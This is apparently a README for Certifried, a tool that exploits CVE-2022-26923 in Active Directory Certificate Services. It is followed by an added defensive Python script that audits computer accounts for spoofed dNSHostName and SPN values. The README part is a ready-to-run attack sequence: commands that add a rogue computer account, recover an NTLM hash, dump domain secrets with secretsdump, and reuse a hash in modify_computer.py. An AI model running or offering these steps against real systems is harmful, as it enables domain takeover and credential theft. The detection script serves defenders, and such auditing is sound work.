Certifried makes the steps to abuse CVE-2022-26923 easier to replicate. The manual steps to reproduce the vulnerability are listed below. A detailed article by the original author can be read here.
- Add a computer account and update the necessary attributes:

```sh
python3 certifried.py domain.com/lowpriv:'Password1' -dc-ip 10.10.10.10
```

  The next step is to request the certificate manually; you can refer here.

- Recover the NTLM hash:

```sh
python3 certifried.py domain.com/lowpriv:'Password1' -dc-ip 10.10.10.10 -use-ldap
```

- Proceed with secretsdump:

```sh
python3 certifried.py domain.com/lowpriv:'Password1' -dc-ip 10.10.10.10 -computer-name 'ControlledComputer' -computer-pass 'Password123' -use-ldap -dump
```
Note: If you receive a "Name Service not found" error, you may need to add the target IP to /etc/hosts.
CAVEAT: this will modify the servicePrincipalName and dnsHostName attributes of the current computer account.

```sh
python3 modify_computer.py range.net/ws01\$@192.168.86.182 -hashes :0e3ae07798e1bc9e02b049a795a7e69f
```
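From the defender's side, as an added example that is not part of the Certifried project: the check below audits computer accounts for the attribute tampering the caveat above describes, a dNSHostName or SPN that names a different host than the account itself, or one dNSHostName shared by two accounts. The domain name and the records are constructed; in practice they would come from an LDAP query for objectClass=computer.

```python
"""Audit computer accounts for dNSHostName / SPN values that do not match the
account's own name. Added example, not Certifried project code."""

DOMAIN = "domain.com"  # assumed domain, matching the examples above

# Constructed sample of what an LDAP query for computer objects might return.
COMPUTERS = [
    {"sAMAccountName": "DC01$", "dNSHostName": "dc01.domain.com",
     "servicePrincipalName": ["HOST/dc01.domain.com", "HOST/DC01"]},
    {"sAMAccountName": "WS01$", "dNSHostName": "ws01.domain.com",
     "servicePrincipalName": ["HOST/ws01.domain.com", "HOST/WS01"]},
    # A new account whose dNSHostName has been pointed at the DC's name.
    {"sAMAccountName": "ControlledComputer$", "dNSHostName": "dc01.domain.com",
     "servicePrincipalName": []},
]


def expected_fqdn(sam_account_name, domain=DOMAIN):
    """FQDN a computer account normally carries: <name without $>.<domain>."""
    return f"{sam_account_name.rstrip('$').lower()}.{domain.lower()}"


def find_suspicious(computers, domain=DOMAIN):
    """Return a list of (sAMAccountName, reason) for every anomaly found."""
    findings = []
    owners_by_dns = {}
    for c in computers:
        sam = c["sAMAccountName"]
        dns = (c.get("dNSHostName") or "").lower()
        # 1. dNSHostName should match the account's own name.
        if dns and dns != expected_fqdn(sam, domain):
            findings.append((sam, f"dNSHostName {dns!r} does not match account name"))
        if dns:
            owners_by_dns.setdefault(dns, []).append(sam)
        # 2. Fully qualified SPN hosts should also be the account's own FQDN.
        for spn in c.get("servicePrincipalName", []):
            host = spn.split("/", 1)[1].lower() if "/" in spn else ""
            if "." in host and host != expected_fqdn(sam, domain):
                findings.append((sam, f"SPN {spn!r} names another host"))
    # 3. Two accounts claiming the same dNSHostName is never legitimate.
    for dns, owners in owners_by_dns.items():
        if len(owners) > 1:
            for sam in owners:
                others = [o for o in owners if o != sam]
                findings.append((sam, f"dNSHostName {dns!r} shared with {others}"))
    return findings


if __name__ == "__main__":
    for account, reason in find_suspicious(COMPUTERS):
        print(f"{account}: {reason}")
```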